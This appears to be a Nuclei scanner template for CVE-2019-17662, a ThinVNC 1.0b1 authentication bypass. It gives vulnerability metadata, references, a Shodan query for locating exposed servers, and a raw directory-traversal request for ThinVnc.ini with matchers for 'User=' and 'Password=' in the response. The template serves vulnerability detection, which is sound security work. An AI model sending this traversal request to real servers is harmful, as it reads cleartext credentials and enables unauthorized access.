id: CVE-2019-17662 info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. impact: | An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.68973 epss-percentile: 0.97703 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and - type: word part: header words: - "application/binary" - type: status status: - 200 # digest: 490a00463044022060ee8484080d55df3f5ada7812ffb4c78b08c400c3913dd3e3d72618a5ada2a7022018fcf5495fdae337294f9f11d4f0bc7a3735d4853558c10f484593c519e810d0:922c64590222798bb761d5b6d8e72950